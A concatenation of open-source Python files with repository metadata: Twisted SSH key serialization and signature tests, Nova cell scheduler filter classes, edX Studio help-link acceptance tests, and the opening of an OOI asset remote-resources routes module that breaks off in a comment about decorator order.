                     keydata.privateRSA_openssh_encrypted)
    # The last 8 characters of the fixture are the comment; a public key
    # serialized without an explicit comment omits them.
    self.assertEqual(key.public().toString('openssh'),
                     keydata.publicRSA_openssh[:-8]) # no comment
    self.assertEqual(key.public().toString('openssh', 'comment'),
                     keydata.publicRSA_openssh)
    key = keys.Key.fromString(keydata.privateDSA_lsh)
    self.assertEqual(key.toString('openssh'), keydata.privateDSA_openssh)
    self.assertEqual(key.public().toString('openssh', 'comment'),
                     keydata.publicDSA_openssh)
    self.assertEqual(key.public().toString('openssh'),
                     keydata.publicDSA_openssh[:-8]) # no comment
def test_toLSH(self):
    """
    Test that the Key object generates LSH keys correctly.
    """
    # assertEqual: non-deprecated spelling of assertEquals.
    key = keys.Key.fromString(keydata.privateRSA_openssh)
    self.assertEqual(key.toString('lsh'), keydata.privateRSA_lsh)
    self.assertEqual(key.public().toString('lsh'),
                     keydata.publicRSA_lsh)
    key = keys.Key.fromString(keydata.privateDSA_openssh)
    self.assertEqual(key.toString('lsh'), keydata.privateDSA_lsh)
    self.assertEqual(key.public().toString('lsh'),
                     keydata.publicDSA_lsh)
def test_toAgentv3(self):
    """
    Test that the Key object generates Agent v3 keys correctly.
    """
    # assertEqual: non-deprecated spelling of assertEquals.
    key = keys.Key.fromString(keydata.privateRSA_openssh)
    self.assertEqual(key.toString('agentv3'), keydata.privateRSA_agentv3)
    key = keys.Key.fromString(keydata.privateDSA_openssh)
    self.assertEqual(key.toString('agentv3'), keydata.privateDSA_agentv3)
def test_toStringErrors(self):
    """
    Test that toString raises errors appropriately.
    """
    # Requesting an unknown serialization format must fail loudly.
    key = keys.Key(self.rsaObj)
    self.assertRaises(keys.BadKeyError, key.toString, 'bad_type')
def test_sign(self):
    """
    Test that the Key object generates correct signatures.
    """
    # assertEqual: non-deprecated spelling of assertEquals.
    key = keys.Key.fromString(keydata.privateRSA_openssh)
    self.assertEqual(key.sign(''), self.rsaSignature)
    key = keys.Key.fromString(keydata.privateDSA_openssh)
    self.assertEqual(key.sign(''), self.dsaSignature)
def test_verify(self):
    """
    Test that the Key object correctly verifies signatures.
    """
    key = keys.Key.fromString(keydata.publicRSA_openssh)
    self.assertTrue(key.verify(self.rsaSignature, ''))
    # Wrong data, and a signature from the other algorithm, both fail.
    self.assertFalse(key.verify(self.rsaSignature, 'a'))
    self.assertFalse(key.verify(self.dsaSignature, ''))
    key = keys.Key.fromString(keydata.publicDSA_openssh)
    self.assertTrue(key.verify(self.dsaSignature, ''))
    self.assertFalse(key.verify(self.dsaSignature, 'a'))
    self.assertFalse(key.verify(self.rsaSignature, ''))
def test_repr(self):
    """
    Test the pretty representation of Key.
    """
    # assertEqual: non-deprecated spelling of assertEquals.  The expected
    # text must match the multi-line repr byte for byte (tab-indented
    # attribute hex values).
    self.assertEqual(repr(keys.Key(self.rsaObj)),
"""<RSA Private Key (0 bits)
attr e:
\t02
attr d:
\t03
attr n:
\t01
attr q:
\t05
attr p:
\t04
attr u:
\t04>""")
| agpl-3.0 |
isyippee/nova | nova/cells/filters/__init__.py | 61 | 2105 | # Copyright (c) 2012-2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cell scheduler filters
"""
from oslo_log import log as logging
from nova import filters
from nova import policy
LOG = logging.getLogger(__name__)
class BaseCellFilter(filters.BaseFilter):
    """Base class for cell filters."""

    def authorized(self, ctxt):
        """Return whether or not the context is authorized for this filter
        based on policy.

        The policy action is "cells_scheduler_filter:<name>" where <name>
        is the name of the filter class.
        """
        action = 'cells_scheduler_filter:' + self.__class__.__name__
        credentials = {'project_id': ctxt.project_id,
                       'user_id': ctxt.user_id}
        # do_raise=False: report the decision instead of raising.
        return policy.enforce(ctxt, action, credentials, do_raise=False)

    def _filter_one(self, cell, filter_properties):
        # Delegate the per-cell decision to the subclass hook.
        return self.cell_passes(cell, filter_properties)

    def cell_passes(self, cell, filter_properties):
        """Return True if the CellState passes the filter, otherwise False.

        Override this in a subclass.
        """
        raise NotImplementedError()
class CellFilterHandler(filters.BaseFilterHandler):
    """Filter handler restricted to BaseCellFilter subclasses."""

    def __init__(self):
        # Only classes deriving from BaseCellFilter are discovered/run.
        super(CellFilterHandler, self).__init__(BaseCellFilter)
def all_filters():
    """Return a list of filter classes found in this directory.

    This method is used as the default for available scheduler filters
    and should return a list of all filter classes available.
    """
    handler = CellFilterHandler()
    return handler.get_all_classes()
| apache-2.0 |
fintech-circle/edx-platform | common/test/acceptance/tests/studio/test_studio_help.py | 1 | 43324 | """
Test the Studio help links.
"""
from unittest import skip
from nose.plugins.attrib import attr
from common.test.acceptance.fixtures.course import XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.studio.asset_index import AssetIndexPage
from common.test.acceptance.pages.studio.course_info import CourseUpdatesPage
from common.test.acceptance.pages.studio.edit_tabs import PagesPage
from common.test.acceptance.pages.studio.import_export import (
ExportCoursePage,
ExportLibraryPage,
ImportCoursePage,
ImportLibraryPage
)
from common.test.acceptance.pages.studio.index import DashboardPage, HomePage, IndexPage
from common.test.acceptance.pages.studio.library import LibraryPage
from common.test.acceptance.pages.studio.overview import CourseOutlinePage
from common.test.acceptance.pages.studio.settings import SettingsPage
from common.test.acceptance.pages.studio.settings_advanced import AdvancedSettingsPage
from common.test.acceptance.pages.studio.settings_certificates import CertificatesPage
from common.test.acceptance.pages.studio.settings_graders import GradingPage
from common.test.acceptance.pages.studio.settings_group_configurations import GroupConfigurationsPage
from common.test.acceptance.pages.studio.textbook_upload import TextbookUploadPage
from common.test.acceptance.pages.studio.users import CourseTeamPage, LibraryUsersPage
from common.test.acceptance.pages.studio.utils import click_css, click_studio_help, studio_help_links
from common.test.acceptance.tests.helpers import (
AcceptanceTest,
assert_nav_help_link,
assert_side_bar_help_link,
url_for_help
)
from common.test.acceptance.tests.studio.base_studio_test import ContainerBase, StudioCourseTest, StudioLibraryTest
def _get_expected_documentation_url(path):
    """
    Return the expected URL for *path* within the course-author
    ("Building and Running a Course") documentation.
    """
    return url_for_help('course_author', path)
@attr(shard=10)
class StudioHelpTest(StudioCourseTest):
    """Tests for Studio help."""

    def test_studio_help_links(self):
        """The help menu shows every expected link with the right text."""
        page = DashboardPage(self.browser)
        page.visit()
        click_studio_help(page)
        expected_links = [{
            'href': u'http://docs.edx.org/',
            'text': u'edX Documentation',
            'sr_text': u'Access documentation on http://docs.edx.org'
        }, {
            'href': u'https://open.edx.org/',
            'text': u'Open edX Portal',
            'sr_text': u'Access the Open edX Portal'
        }, {
            'href': u'https://www.edx.org/course/overview-creating-edx-course-edx-edx101#.VO4eaLPF-n1',
            'text': u'Enroll in edX101',
            'sr_text': u'Enroll in edX101: Overview of Creating an edX Course'
        }, {
            'href': u'https://www.edx.org/course/creating-course-edx-studio-edx-studiox',
            'text': u'Enroll in StudioX',
            'sr_text': u'Enroll in StudioX: Creating a Course with edX Studio'
        }, {
            'href': u'mailto:partner-support@example.com',
            'text': u'Contact Us',
            'sr_text': 'Send an email to partner-support@example.com'
        }]
        for expected, actual in zip(expected_links, studio_help_links(page)):
            self.assertEqual(expected['href'], actual.get_attribute('href'))
            self.assertEqual(expected['text'], actual.text)
            # The screen-reader text lives in the sibling <span> element.
            self.assertEqual(
                expected['sr_text'],
                actual.find_element_by_xpath('following-sibling::span').text
            )
@attr(shard=10)
class SignInHelpTest(AcceptanceTest):
    """
    Tests help links on 'Sign In' page.
    """

    def setUp(self):
        super(SignInHelpTest, self).setUp()
        self.index_page = IndexPage(self.browser)
        self.index_page.visit()

    def test_sign_in_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Sign In' page opens the
        getting-started documentation.
        """
        sign_in_page = self.index_page.click_sign_in()
        # The visitor is anonymous here, so check the signed-out variant.
        assert_nav_help_link(
            test=self,
            page=sign_in_page,
            href=_get_expected_documentation_url('/getting_started/index.html'),
            signed_in=False
        )
@attr(shard=10)
class SignUpHelpTest(AcceptanceTest):
    """
    Tests help links on 'Sign Up' page.
    """

    def setUp(self):
        super(SignUpHelpTest, self).setUp()
        self.index_page = IndexPage(self.browser)
        self.index_page.visit()

    def test_sign_up_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Sign Up' page opens the
        getting-started documentation.
        """
        sign_up_page = self.index_page.click_sign_up()
        # The visitor is anonymous here, so check the signed-out variant.
        assert_nav_help_link(
            test=self,
            page=sign_up_page,
            href=_get_expected_documentation_url('/getting_started/index.html'),
            signed_in=False
        )
@attr(shard=10)
class HomeHelpTest(StudioCourseTest):
    """
    Tests help links on 'Home' (Courses tab) page.
    """

    def setUp(self):  # pylint: disable=arguments-differ
        super(HomeHelpTest, self).setUp()
        self.home_page = HomePage(self.browser)
        self.home_page.visit()

    def test_course_home_nav_help(self):
        """
        The nav-bar 'Help' link on the Home page opens the Studio
        getting-started documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.home_page,
            href=_get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
        )

    def test_course_home_side_bar_help(self):
        """
        The 'Getting Started with edX Studio' sidebar link on the Home page
        opens the Studio getting-started documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.home_page,
            href=_get_expected_documentation_url('/getting_started/CA_get_started_Studio.html'),
            help_text='Getting Started with edX Studio',
            as_list_item=True
        )
@attr(shard=10)
class NewCourseHelpTest(AcceptanceTest):
    """
    Test help links while creating a new course.
    """

    def setUp(self):
        super(NewCourseHelpTest, self).setUp()
        self.auth_page = AutoAuthPage(self.browser, staff=True)
        self.dashboard_page = DashboardPage(self.browser)
        self.auth_page.visit()
        self.dashboard_page.visit()
        # Open the 'Create a New Course' form before each test.
        self.assertTrue(self.dashboard_page.new_course_button.present)
        self.dashboard_page.click_new_course_button()

    def test_course_create_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Create a New Course' form opens the
        Studio getting-started documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.dashboard_page,
            href=_get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
        )

    def test_course_create_side_bar_help(self):
        """
        The 'Getting Started with edX Studio' sidebar link on the
        'Create a New Course' form opens the Studio getting-started
        documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.dashboard_page,
            href=_get_expected_documentation_url('/getting_started/CA_get_started_Studio.html'),
            help_text='Getting Started with edX Studio',
            as_list_item=True
        )
@attr(shard=10)
class NewLibraryHelpTest(AcceptanceTest):
    """
    Test help links while creating a new library.
    """

    def setUp(self):
        super(NewLibraryHelpTest, self).setUp()
        self.auth_page = AutoAuthPage(self.browser, staff=True)
        self.dashboard_page = DashboardPage(self.browser)
        self.auth_page.visit()
        self.dashboard_page.visit()
        # Open the 'Create a New Library' form before each test.
        self.assertTrue(self.dashboard_page.has_new_library_button)
        self.dashboard_page.click_new_library()

    def test_library_create_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Create a New Library' form opens the
        Studio getting-started documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.dashboard_page,
            href=_get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
        )

    def test_library_create_side_bar_help(self):
        """
        The 'Getting Started with edX Studio' sidebar link on the
        'Create a New Library' form opens the Studio getting-started
        documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.dashboard_page,
            href=_get_expected_documentation_url('/getting_started/CA_get_started_Studio.html'),
            help_text='Getting Started with edX Studio',
            as_list_item=True
        )
@attr(shard=10)
class LibraryTabHelpTest(AcceptanceTest):
    """
    Test help links on the library tab present at dashboard.
    """

    def setUp(self):
        super(LibraryTabHelpTest, self).setUp()
        self.auth_page = AutoAuthPage(self.browser, staff=True)
        self.dashboard_page = DashboardPage(self.browser)
        self.auth_page.visit()
        self.dashboard_page.visit()

    def test_library_tab_nav_help(self):
        """
        The nav-bar 'Help' link on the dashboard's Libraries tab opens the
        Studio getting-started documentation.
        """
        self.assertTrue(self.dashboard_page.has_new_library_button)
        # Switch from the Courses tab to the Libraries tab.
        click_css(self.dashboard_page, '#course-index-tabs .libraries-tab', 0, False)
        assert_nav_help_link(
            test=self,
            page=self.dashboard_page,
            href=_get_expected_documentation_url('/getting_started/CA_get_started_Studio.html')
        )
@attr(shard=10)
class LibraryHelpTest(StudioLibraryTest):
    """
    Test help links on a Library page.
    """

    def setUp(self):
        super(LibraryHelpTest, self).setUp()
        self.library_page = LibraryPage(self.browser, self.library_key)
        self.library_user_page = LibraryUsersPage(self.browser, self.library_key)

    def test_library_content_nav_help(self):
        """
        The nav-bar 'Help' link on a content library page opens the
        libraries documentation.
        """
        self.library_page.visit()
        assert_nav_help_link(
            test=self,
            page=self.library_page,
            href=_get_expected_documentation_url('/course_components/libraries.html')
        )

    def test_library_content_side_bar_help(self):
        """
        The 'Learn more about content libraries' sidebar link on a content
        library page opens the libraries documentation.
        """
        self.library_page.visit()
        assert_side_bar_help_link(
            test=self,
            page=self.library_page,
            href=_get_expected_documentation_url('/course_components/libraries.html'),
            help_text='Learn more about content libraries'
        )

    def test_library_user_access_setting_nav_help(self):
        """
        The nav-bar 'Help' link on a library's 'User Access' settings page
        opens the library access documentation.
        """
        self.library_user_page.visit()
        assert_nav_help_link(
            test=self,
            page=self.library_user_page,
            href=_get_expected_documentation_url(
                '/course_components/libraries.html#give-other-users-access-to-your-library'
            ),
        )
@attr(shard=10)
class LibraryImportHelpTest(StudioLibraryTest):
    """
    Test help links on a Library import page.
    """

    def setUp(self):
        super(LibraryImportHelpTest, self).setUp()
        self.library_import_page = ImportLibraryPage(self.browser, self.library_key)
        self.library_import_page.visit()

    def test_library_import_nav_help(self):
        """
        The nav-bar 'Help' link on the Library import page opens the
        import-a-library documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.library_import_page,
            href=_get_expected_documentation_url('/course_components/libraries.html#import-a-library')
        )

    def test_library_import_side_bar_help(self):
        """
        The 'Learn more about importing a library' sidebar link on the
        Library import page opens the import-a-library documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.library_import_page,
            href=_get_expected_documentation_url('/course_components/libraries.html#import-a-library'),
            help_text='Learn more about importing a library'
        )
@attr(shard=10)
class LibraryExportHelpTest(StudioLibraryTest):
    """
    Test help links on a Library export pages.
    """

    def setUp(self):
        super(LibraryExportHelpTest, self).setUp()
        self.library_export_page = ExportLibraryPage(self.browser, self.library_key)
        self.library_export_page.visit()

    def test_library_export_nav_help(self):
        """
        The nav-bar 'Help' link on the Library export page opens the
        export-a-library documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.library_export_page,
            href=_get_expected_documentation_url('/course_components/libraries.html#export-a-library')
        )

    def test_library_export_side_bar_help(self):
        """
        The 'Learn more about exporting a library' sidebar link on the
        Library export page opens the export-a-library documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.library_export_page,
            href=_get_expected_documentation_url('/course_components/libraries.html#export-a-library'),
            help_text='Learn more about exporting a library'
        )
@attr(shard=10)
class CourseOutlineHelpTest(StudioCourseTest):
    """
    Tests help links on course outline page.
    """

    def setUp(self):  # pylint: disable=arguments-differ
        super(CourseOutlineHelpTest, self).setUp()
        self.course_outline_page = CourseOutlinePage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.course_outline_page.visit()

    @skip("This scenario depends upon TNL-5460")
    def test_course_outline_nav_help(self):
        """
        The nav-bar 'Help' link on the Course Outline page opens the course
        outline documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.course_outline_page,
            href=_get_expected_documentation_url('/developing_course/course_outline.html')
        )

    def test_course_outline_side_bar_help(self):
        """
        The 'Learn more about the course outline' sidebar link on the Course
        Outline page opens the course outline documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.course_outline_page,
            href=_get_expected_documentation_url('/developing_course/course_outline.html'),
            help_text='Learn more about the course outline',
            # Several sidebar links exist; check the first one.
            index=0
        )
@attr(shard=10)
class CourseUpdateHelpTest(StudioCourseTest):
    """
    Test help links on Course Update page.
    """

    def setUp(self):  # pylint: disable=arguments-differ
        super(CourseUpdateHelpTest, self).setUp()
        self.course_update_page = CourseUpdatesPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.course_update_page.visit()

    def test_course_update_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Course Update' page opens the
        handouts-and-updates documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.course_update_page,
            href=_get_expected_documentation_url('/course_assets/handouts_updates.html'),
        )
@attr(shard=10)
class AssetIndexHelpTest(StudioCourseTest):
    """
    Test help links on Course 'Files & Uploads' page.
    """

    def setUp(self):  # pylint: disable=arguments-differ
        super(AssetIndexHelpTest, self).setUp()
        self.course_asset_index_page = AssetIndexPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.course_asset_index_page.visit()

    def test_asset_index_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Files & Uploads' page opens the
        course files documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.course_asset_index_page,
            href=_get_expected_documentation_url('/course_assets/course_files.html'),
        )

    def test_asset_index_side_bar_help(self):
        """
        The 'Learn more about managing files' sidebar link on the
        'Files & Uploads' page opens the course files documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.course_asset_index_page,
            href=_get_expected_documentation_url('/course_assets/course_files.html'),
            help_text='Learn more about managing files'
        )
@attr(shard=10)
class CoursePagesHelpTest(StudioCourseTest):
    """
    Test help links on Course 'Pages' page.
    """

    def setUp(self):  # pylint: disable=arguments-differ
        super(CoursePagesHelpTest, self).setUp()
        self.course_pages_page = PagesPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.course_pages_page.visit()

    def test_course_page_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Pages' page opens the pages
        documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.course_pages_page,
            href=_get_expected_documentation_url('/course_assets/pages.html'),
        )
@attr(shard=10)
class UploadTextbookHelpTest(StudioCourseTest):
    """
    Test help links on Course 'Textbooks' page.
    """

    def setUp(self):  # pylint: disable=arguments-differ
        super(UploadTextbookHelpTest, self).setUp()
        self.course_textbook_upload_page = TextbookUploadPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.course_textbook_upload_page.visit()

    def test_course_textbook_upload_nav_help(self):
        """
        The nav-bar 'Help' link on the 'Textbooks' page opens the textbooks
        documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.course_textbook_upload_page,
            href=_get_expected_documentation_url('/course_assets/textbooks.html'),
        )

    def test_course_textbook_side_bar_help(self):
        """
        The 'Learn more about textbooks' sidebar link on the 'Textbooks'
        page opens the textbooks documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.course_textbook_upload_page,
            href=_get_expected_documentation_url('/course_assets/textbooks.html'),
            help_text='Learn more about textbooks'
        )
@attr(shard=10)
class StudioUnitHelpTest(ContainerBase):
    """
    Tests help links on Unit page.
    """

    def setUp(self, is_staff=True):
        super(StudioUnitHelpTest, self).setUp(is_staff=is_staff)

    def populate_course_fixture(self, course_fixture):
        """
        Populates the course fixture.

        Enables the split_test advanced module and adds a section
        containing a subsection with a single unit.
        """
        course_fixture.add_advanced_settings(
            {u"advanced_modules": {"value": ["split_test"]}}
        )
        course_fixture.add_children(
            XBlockFixtureDesc('chapter', 'Test Section').add_children(
                XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
                    XBlockFixtureDesc('vertical', 'Test Unit')
                )
            )
        )

    def test_unit_page_nav_help(self):
        """
        The nav-bar 'Help' link on the Unit page opens the course units
        documentation.
        """
        unit_page = self.go_to_unit_page()
        assert_nav_help_link(
            test=self,
            page=unit_page,
            href=_get_expected_documentation_url('/developing_course/course_units.html'),
        )
@attr(shard=10)
class SettingsHelpTest(StudioCourseTest):
    """
    Tests help links on Schedule and Details Settings page.
    """

    def setUp(self, is_staff=False, test_xss=True):
        super(SettingsHelpTest, self).setUp()
        self.settings_page = SettingsPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.settings_page.visit()

    def test_settings_page_nav_help(self):
        """
        The nav-bar 'Help' link on the Settings page opens the student-view
        setup documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.settings_page,
            href=_get_expected_documentation_url('/set_up_course/setting_up_student_view.html'),
        )
@attr(shard=10)
class GradingPageHelpTest(StudioCourseTest):
    """
    Tests help links on Grading page.
    """

    def setUp(self, is_staff=False, test_xss=True):
        super(GradingPageHelpTest, self).setUp()
        self.grading_page = GradingPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.grading_page.visit()

    def test_grading_page_nav_help(self):
        """
        The nav-bar 'Help' link on the Grading page opens the grading
        documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.grading_page,
            href=_get_expected_documentation_url('/grading/index.html'),
        )
@attr(shard=10)
class CourseTeamSettingsHelpTest(StudioCourseTest):
    """
    Tests help links on Course Team settings page.
    """

    def setUp(self, is_staff=False, test_xss=True):
        super(CourseTeamSettingsHelpTest, self).setUp()
        self.course_team_settings_page = CourseTeamPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.course_team_settings_page.visit()

    def test_course_course_team_nav_help(self):
        """
        The nav-bar 'Help' link on the Course Team settings page opens the
        course staffing documentation.
        """
        assert_nav_help_link(
            test=self,
            page=self.course_team_settings_page,
            href=_get_expected_documentation_url('/set_up_course/course_staffing.html#add-course-team-members'),
        )
@attr(shard=10)
class CourseGroupConfigurationHelpTest(StudioCourseTest):
    """
    Tests help links on course Group Configurations settings page.
    """

    def setUp(self, is_staff=False, test_xss=True):
        super(CourseGroupConfigurationHelpTest, self).setUp()
        self.course_group_configuration_page = GroupConfigurationsPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.course_group_configuration_page.visit()

    def test_course_group_conf_nav_help(self):
        """
        The nav-bar 'Help' link on the Group Configurations settings page
        opens the documentation index.
        """
        assert_nav_help_link(
            test=self,
            page=self.course_group_configuration_page,
            href=_get_expected_documentation_url('/index.html'),
        )

    def test_course_group_conf_content_group_side_bar_help(self):
        """
        The 'Learn More' sidebar link under the content group section of the
        Group Configurations settings page opens the cohorted courseware
        documentation.
        """
        assert_side_bar_help_link(
            test=self,
            page=self.course_group_configuration_page,
            href=_get_expected_documentation_url('/course_features/cohorts/cohorted_courseware.html'),
            help_text='Learn More'
        )
@attr(shard=10)
class AdvancedSettingHelpTest(StudioCourseTest):
    """
    Test the help links shown on the course Advanced Settings page.
    """
    def setUp(self, is_staff=False, test_xss=True):
        super(AdvancedSettingHelpTest, self).setUp()
        info = self.course_info
        self.advanced_settings = AdvancedSettingsPage(
            self.browser, info['org'], info['number'], info['run']
        )
        self.advanced_settings.visit()

    def test_advanced_settings_nav_help(self):
        """
        Scenario: the 'Help' link in the navigation bar opens the correct
        documentation URL from the Advanced Settings page.
        """
        help_url = _get_expected_documentation_url('/index.html')
        assert_nav_help_link(
            test=self,
            page=self.advanced_settings,
            href=help_url,
        )
@attr(shard=10)
class CertificatePageHelpTest(StudioCourseTest):
    """
    Test the help links shown on the course Certificate settings page.
    """
    def setUp(self, is_staff=False, test_xss=True):
        super(CertificatePageHelpTest, self).setUp()
        info = self.course_info
        self.certificates_page = CertificatesPage(
            self.browser, info['org'], info['number'], info['run']
        )
        self.certificates_page.visit()

    def test_certificate_page_nav_help(self):
        """
        Scenario: the 'Help' link in the navigation bar opens the correct
        documentation URL from the Certificate settings page.
        """
        help_url = _get_expected_documentation_url(
            '/set_up_course/creating_course_certificates.html'
        )
        assert_nav_help_link(
            test=self,
            page=self.certificates_page,
            href=help_url,
        )

    def test_certificate_page_side_bar_help(self):
        """
        Scenario: the 'Learn more about certificates' sidebar link opens the
        correct documentation URL from the Certificate settings page.
        """
        help_url = _get_expected_documentation_url(
            '/set_up_course/creating_course_certificates.html'
        )
        assert_side_bar_help_link(
            test=self,
            page=self.certificates_page,
            href=help_url,
            help_text='Learn more about certificates',
        )
@attr(shard=10)
class GroupExperimentConfigurationHelpTest(ContainerBase):
    """
    Test the sidebar help link for Experiment Group Configurations on the
    course Group Configurations settings page.
    """
    def setUp(self):  # pylint: disable=arguments-differ
        super(GroupExperimentConfigurationHelpTest, self).setUp()
        info = self.course_info
        self.group_configuration_page = GroupConfigurationsPage(
            self.browser, info['org'], info['number'], info['run']
        )
        self.group_configuration_page.visit()

    def populate_course_fixture(self, course_fixture):
        """
        Populate the course fixture: enable the 'split_test' advanced module
        so that experiment group configurations are available.
        """
        course_fixture.add_advanced_settings(
            {u"advanced_modules": {"value": ["split_test"]}}
        )

    def test_course_group_configuration_experiment_side_bar_help(self):
        """
        Scenario: the 'Learn More' sidebar link under 'Experiment Group
        Configurations' opens the correct documentation URL.
        """
        help_url = _get_expected_documentation_url(
            '/course_features/content_experiments/content_experiments_configure.html'
            '#set-up-group-configurations-in-edx-studio'
        )
        assert_side_bar_help_link(
            test=self,
            page=self.group_configuration_page,
            href=help_url,
            help_text='Learn More',
        )
@attr(shard=10)
class ToolsImportHelpTest(StudioCourseTest):
    """
    Test the help links shown on the tools import pages.
    """
    def setUp(self, is_staff=False, test_xss=True):
        super(ToolsImportHelpTest, self).setUp()
        info = self.course_info
        self.import_page = ImportCoursePage(
            self.browser, info['org'], info['number'], info['run']
        )
        self.import_page.visit()

    def test_tools_import_nav_help(self):
        """
        Scenario: the 'Help' link in the navigation bar opens the correct
        documentation URL from the course import page.
        """
        help_url = _get_expected_documentation_url(
            '/releasing_course/export_import_course.html#import-a-course'
        )
        assert_nav_help_link(
            test=self,
            page=self.import_page,
            href=help_url,
        )

    def test_tools_import_side_bar_help(self):
        """
        Scenario: the 'Learn more about importing a course' sidebar link opens
        the correct documentation URL from the course import page.
        """
        help_url = _get_expected_documentation_url(
            '/releasing_course/export_import_course.html#import-a-course'
        )
        assert_side_bar_help_link(
            test=self,
            page=self.import_page,
            href=help_url,
            help_text='Learn more about importing a course',
        )
@attr(shard=10)
class ToolsExportHelpTest(StudioCourseTest):
    """
    Tests help links on tools export pages.
    """
    def setUp(self, is_staff=False, test_xss=True):
        super(ToolsExportHelpTest, self).setUp()
        self.export_page = ExportCoursePage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        self.export_page.visit()

    # NOTE: both test methods were previously named test_tools_import_* and
    # their docstrings referred to the import page — a copy/paste slip from
    # ToolsImportHelpTest. Renamed so failure reports identify the right page.
    def test_tools_export_nav_help(self):
        """
        Scenario: Help link in navigation bar is working on tools export page
        Given that I am on the export tools page
        And I want help about the process
        And I click the 'Help' in the navigation bar
        Then Help link should open.
        And help url should be correct
        """
        expected_url = _get_expected_documentation_url('/releasing_course/export_import_course.html#export-a-course')
        # Assert that help link is correct.
        assert_nav_help_link(
            test=self,
            page=self.export_page,
            href=expected_url,
        )

    def test_tools_export_side_bar_help(self):
        """
        Scenario: Help link in side bar is working on tools export page
        Given that I am on the tools export page
        And I want help about the process
        And I click the 'Learn more about exporting a course' in the sidebar links
        Then Help link should open.
        And help url should be correct
        """
        expected_url = _get_expected_documentation_url('/releasing_course/export_import_course.html#export-a-course')
        # Assert that help link is correct.
        assert_side_bar_help_link(
            test=self,
            page=self.export_page,
            href=expected_url,
            help_text='Learn more about exporting a course',
        )
@attr(shard=10)
class StudioWelcomeHelpTest(AcceptanceTest):
    """
    Test the help link on the 'Welcome' page (user not logged in).
    """
    def setUp(self):
        super(StudioWelcomeHelpTest, self).setUp()
        self.index_page = IndexPage(self.browser)
        self.index_page.visit()

    def test_welcome_nav_help(self):
        """
        Scenario: the 'Help' link in the navigation bar opens the correct
        documentation URL from the 'Welcome' page while signed out.
        """
        help_url = _get_expected_documentation_url('/getting_started/index.html')
        assert_nav_help_link(
            test=self,
            page=self.index_page,
            href=help_url,
            signed_in=False
        )
| agpl-3.0 |
asascience-open/ooi-ui-services | ooiservices/app/uframe/assets_remote_resources.py | 1 | 4930 |
"""
Asset Management - Asset Remote Resources routes.
Routes:
[GET] /remote_resources/<int:asset_id> # Get all remote resources for asset using asset id.
[GET] /remote_resources/<string:asset_uid> # Get all remote resources for asset using asset uid.
[GET] /remote_resource/<int:resource_id> # Get remote resource by remoteResourceId.
[POST] /remote_resource/<string:asset_uid> # Create a remote resource for an asset
[PUT] /remote_resource/<string:asset_uid> # Update a remote resource for an asset
"""
__author__ = 'Edna Donoughe'
from flask import request, jsonify, current_app
from ooiservices.app.main.errors import (bad_request, conflict)
from ooiservices.app.uframe import uframe as api
from ooiservices.app.main.authentication import auth
from ooiservices.app.decorators import scope_required
from ooiservices.app.uframe.assets_create_update import (_create_remote_resource, _update_remote_resource,
_get_remote_resources_by_asset_id,
_get_remote_resources_by_asset_uid,
_get_remote_resource_by_resource_id)
import json
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Remote Resources routes.
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Get the remote resources for an asset using asset id.
# NOTE(review): @api.route must be the first-listed (outermost) decorator.
# Decorators apply bottom-up, so with the route decorator listed last (as
# before) Flask registered the *unwrapped* view function and the login/scope
# checks never ran for incoming requests. Assumes auth.login_required and
